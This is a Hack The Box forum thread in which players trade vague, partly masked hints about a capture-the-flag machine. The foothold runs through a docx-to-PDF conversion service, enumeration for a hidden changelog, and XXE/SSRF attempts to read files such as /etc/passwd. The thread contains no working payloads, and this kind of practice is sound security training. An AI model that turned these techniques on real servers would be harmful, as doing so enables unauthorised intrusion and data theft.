Patents

2456

Comments

  • Didn't get that changelog from the developer, but managed to get some dependencies file pointing to some conversion utility... then... generated a pdf from a normal docx and checked what was the version of the thing to try to attack... got to some papers and blogs,... tried to embed this to that, upload that and nothing! keep failing every single step. aux what a box...
    Any help will be appreciated.

    pm please!

  • edited January 2020

    Type your comment> @gbyolo said:

    I think it's time to give some hints about the initial foothold.
    As I could understand by talking to some of you on social channels, the "obvious" vulnerability everybody is talking about is correct, however you are all missing some important information to correctly exploit it.
    Try to use a different wordlist to find something useful in the web app. Maybe some developer left traces of a changelog!

    Well consider me truly bamboozled. After many hours of trying the obvious path I see this post, and spend quite a few more hours throwing different wordlists from seclists/dirb/dirbuster/wfuzz at the site. Full recursion, .log, .txt, .conf, .html, .php extensions and nothing. The only changelogs found were in /v***/s***/*/c***. They don't seem to be useful.

  • Type your comment> @arale61 said:

    Didn't get that changelog from the developer, but managed to get some dependencies file pointing to some conversion utility... then... generated a pdf from a normal docx and checked what was the version of the thing to try to attack... got to some papers and blogs,... tried to embed this to that, upload that and nothing! keep failing every single step. aux what a box...
    Any help will be appreciated.

    pm please!

    That's exactly where I am XD I'm wondering if I should be looking at u*****.p and not c******.p

  • Type your comment> @idomino said:

    Type your comment> @arale61 said:

    Didn't get that changelog from the developer, but managed to get some dependencies file pointing to some conversion utility... then... generated a pdf from a normal docx and checked what was the version of the thing to try to attack... got to some papers and blogs,... tried to embed this to that, upload that and nothing! keep failing every single step. aux what a box...
    Any help will be appreciated.

    pm please!

    That's exactly where I am XD I'm wondering if I should be looking at u*****.p and not c******.p

    But the thing here for me is in the conversion process since is the only form of input i see we can try to 'control'.
    I've being messing around with different types of XXE and SSRF attacks but i didn't get any response back from them...
    I will retry again, from the beginning, starting again from XXE... let's see what i can get this time different.

  • Hi all,

    This will be my first difficult box.

    I did have a little go a couple of days ago but this one looks like it needs some time.

    Did anyone figure out what is listing on port 8888?

    I'm not convinced that its the service nmap is reporting.

    If I have helped you in someway, I'd appreciate if you could respect my account on htb.
  • Is that changelog file really necessary to exploit the vuln? I find hard to believe that someone found it in the first 6 hours given that my scans would take days and are only looking for a very reduced extensions types (.lst, .md, .txt...) and with just 30 threads Im getting loads of I/O exception errors...

    Regarding the vuln, I've been able to make the server get a file from my server but I dont think it will lead to a real vuln, unless that file is dropped in a folder or something. Trying to make the server load a local file thru file:/// and putting in the pdf doesnt seem to work too...

    Hack The Box

  • The wordlist is the key, tried tonnes until I got that one from SecLists.

    Got the two changelogs, trying to figure out what's going on, the i**l seems vulnerable and the s****y on that version also seems vulnerable. I hope I'm not drowning in a deep rabbit holes!
  • Finally got user. Really insane box. Mixed feelings at first, but really warmed up to it so far. Also don't plan to respond to PM's for a few days, so don't exepect a quick answer if you want help!

    clubby789

    • GCIH | GCIA
      If you need help with something, PM me how far you've got already, what you've tried etc (I won't respond to profile comments, or on box release night). And remember to +respect me if I helped you ; )
  • Type your comment> @clubby789 said:

    Finally got user. Really insane box. Mixed feelings at first, but really warmed up to it so far. Also don't plan to respond to PM's for a few days, so don't exepect a quick answer if you want help!

    Any hints on the initial foothold? driving me crazy!

  • also got user, thanks to @clubby789 for the last push. pm for nudges on foothold and user.

  • I found a way to sneak in a Doctor X format but I can't tell if the backend conversion uses s****ce or uno****.

    limbernie
    Write-ups | Discord - limbernie#0386

  • edited January 2020

    is it possible to circunvent the checking of w*/d.x** to load an o** instead of a docx? if so pm pls!

    Finally been able to load an o** file into the converter and it seems like it doesnt use a vulnerable u******v, or doesnt use u******v at all. In my vm with the --unsafe-quiet-update flag I was getting good results dumping my /etc /passwd. Time to check more xx* ss** but it doesnt look good, I think i entered in a big rabbit hole.

    L*********e is version 6.0.7 so not vulnerable to webservices and their only vulns are the ones based on py*** l**o that are not gonna work in headless mode.

    Looks like I need to go back enumerating web files in order to find that changelog with neccesary info to exploit. Hope the initial hype is over and now I can finish the scans this time in the free server...

    Hack The Box

  • config.php in upload.php source code, yet nothing ;)

  • When I hear some file extensions.
    image

    Spiderixius

  • And rooted. Long and hard, but definitely learnt some new things.

    clubby789

    • GCIH | GCIA
      If you need help with something, PM me how far you've got already, what you've tried etc (I won't respond to profile comments, or on box release night). And remember to +respect me if I helped you ; )
  • i got the passwd file , some hints to get user please?
    there is no place like 127.0.0.1
  • Type your comment> @salt said:

    The wordlist is the key, tried tonnes until I got that one from SecLists.

    Got the two changelogs, trying to figure out what's going on, the i**l seems vulnerable and the s****y on that version also seems vulnerable. I hope I'm not drowning in a deep rabbit holes!

    TWO? Oh my... I 've found only one! Gotta enumerate again :(

    BadRain

  • edited January 2020

    got www-data some hints from now?

    there is no place like 127.0.0.1
  • Tbh this one is flattening me lmao and I've done this class of vuln multiple times in real life save me lol

  • Finally got initial foothold. Looking for user now.

    Hack The Box

  • Got user.

    Hack The Box

  • Type your comment> @th3y said:

    Finally got initial foothold. Looking for user now.

    Any nudge on the famous changelog file?

  • at last got user, working on the root part now.

    foothold is def p2w. I would have found the file long ago if I/O exceptions and user reboots doesnt were a thing.

    Hack The Box

  • edited January 2020

    Type your comment> @sysdd said:

    Type your comment> @th3y said:

    Finally got initial foothold. Looking for user now.

    Any nudge on the famous changelog file?

    Read point 4 to make an idea the limits of how weird can the filename be:
    https://forum.hackthebox.eu/discussion/1467/machine-submission-checklist

    Then GL dont get disconnections that disturb the discovery process.

    Hack The Box

  • any hint real machine shell?

  • edited January 2020

    Could someone recommend article or method how to properly put malicious stuff in docx for this machine? I have no expiriense in this field, for now i could not understand how it works just by looking deeper in docx.

  • Hi, finally got user.
    For the initial step, you really need to find the changelog... There's one file on one of the paths of the website that is the key for the corresponding attack... That changelog give's you the correct 'configuration' for the docx. If you're not able to do that into the docx, maybe you can find one that already has it on the inet, modify it and done. But this is not the end of the road for access the box. You will need to do more steps to get in.
    I felt the part of 'configuring' the docx harder than the attack itself (for that you'll find plenty of examples on the wild, good documented) and i wanted to explain it here for the ppl like me that are struggling with it.
    So, first, as the creator said, find that changelog, read it and go for the next step.
    Feel free to mark this response as spoiler, was not my intention, but i wanted to give this explanation to help others that were in the same position than me.

  • Type your comment> @salt said:

    The wordlist is the key, tried tonnes until I got that one from SecLists.

    Got the two changelogs, trying to figure out what's going on, the i**l seems vulnerable and the s****y on that version also seems vulnerable. I hope I'm not drowning in a deep rabbit holes!

    Hi

    Did you have to try the lists on multiple paths and not just the root path?

    I've tried many lists from the seclist repo but none seem to find the changelog file.

    There is one list from that repo called sy..... but this seems to obvious?

    A nudge would be appreciated.

    Cheers

    If I have helped you in someway, I'd appreciate if you could respect my account on htb.
  • Finally got through the first part ( with some help) ! Now sleep and look at the next part tomorrow :)

    GPLO

  • Super stumped on root...

    Hack The Box

Sign In to comment.